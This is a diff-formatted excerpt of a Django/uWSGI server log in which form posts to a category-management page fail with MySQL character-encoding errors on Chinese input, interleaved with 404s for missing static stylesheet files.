+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE5\\xAD\\xA9...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE5\\xAD\\xA9...' for column 'k_name' at row 1")
+[pid: 11057|app: 0|req: 1018/1318] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 08:59:32 2021] GET /kind-manage/? => generated 7366 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1018/1319] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 08:59:32 2021] POST /kind-manage/ => generated 206934 bytes in 142 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1019/1320] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1020/1321] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1021/1322] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1022/1323] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 17149] hr_write(): Broken pipe [plugins/http/http.c line 565]
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1023/1324] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1024/1325] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1025/1326] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 08:59:32 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1026/1327] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 08:59:32 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1027/1328] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 08:59:32 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1")
+[pid: 11057|app: 0|req: 1028/1329] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 09:01:02 2021] POST /kind-manage/? => generated 207098 bytes in 135 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1029/1330] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 09:01:03 2021] GET /kind-manage/? => generated 7366 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 32253] hr_write(): Broken pipe [plugins/http/http.c line 565]
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1030/1331] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1031/1332] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1032/1333] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1033/1334] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1034/1335] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 26 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1035/1336] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1036/1337] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:01:03 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1037/1338] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:01:03 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1038/1339] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:01:03 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1039/1340] 219.228.146.156 () {42 vars in 966 bytes} [Thu Jan 14 09:05:46 2021] GET /kind-manage/? => generated 7366 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1040/1341] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1041/1342] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1042/1343] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1043/1344] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1044/1345] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1045/1346] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1046/1347] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1047/1348] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:05:47 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1048/1349] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:05:47 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE6\\x9C\\x8B...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE6\\x9C\\x8B...' for column 'k_name' at row 1")
+[pid: 11057|app: 0|req: 1049/1350] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 09:05:55 2021] POST /kind-manage/? => generated 206936 bytes in 100 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1050/1351] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 09:05:55 2021] GET /kind-manage/? => generated 7366 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 28158] hr_write(): Broken pipe [plugins/http/http.c line 565]
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1051/1352] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1052/1353] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1053/1354] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1054/1355] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1055/1356] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1056/1357] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
